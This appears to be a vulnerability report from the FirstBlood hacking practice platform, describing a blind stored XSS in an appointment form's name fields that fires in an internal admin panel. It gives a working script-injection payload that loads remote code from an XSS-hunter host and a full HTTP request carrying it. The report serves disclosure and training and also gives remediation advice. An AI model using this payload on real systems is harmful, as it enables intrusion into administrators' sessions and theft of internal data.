FirstBlood-#1729Blind XSS in appointments
This issue was discovered on FirstBlood v3



On 2022-12-14, pichik Level 4 reported:

Hello doctor Sean,

DESCRIPTION:

I found that appointment params are vulnerable to blind XSS and executed internaly.
The vulnerable params are fname and lname.
There is no filtering nor encoding, so payload is simple as "><script+src=https://xsshunter.ht></script>.
It will trigger if address in appointment was not found and an attempt to call failed, but can not tell if these are the only requirements.

Here is the request:

POST /api/ba.php HTTP/1.1
Host: 9f0fae8ab2d6-pichik.a.firstbloodhackers.com
Sec-Ch-Ua: "Not?A_Brand";v="8", "Chromium";v="108", "Google Chrome";v="108"
Content-Type: application/x-www-form-urlencoded
Anti-Csrf: 27138-7496-80253

&address=test&city=test&phonenumber=test&email=test&dob=test&a1=&a2=&a3=&message=&slot=&drId=1&ambulance=1&status=&fname="><script+src=https://xsshunter.ht></script>&lname="><script+src=https://xsshunter.ht></script>

POC SCREEN:

Here is screenshot from internal endpoint:

IMPACT:

Attacker can access internal information with this XSS.

REMEDIATION:

HTML encode all user input to prevent XSS.

P1 CRITICAL

Endpoint: /api/ba.php

Parameter: lname,fname

Payload: "><script+src=https://xsshunter.ht></script>


FirstBlood ID: 78
Vulnerability Type: Stored XSS

When booking an appointment with the ambulance value set to "1", the users full name is vulnerable to stored XSS on the internal admin panel "firstblood-helper.com"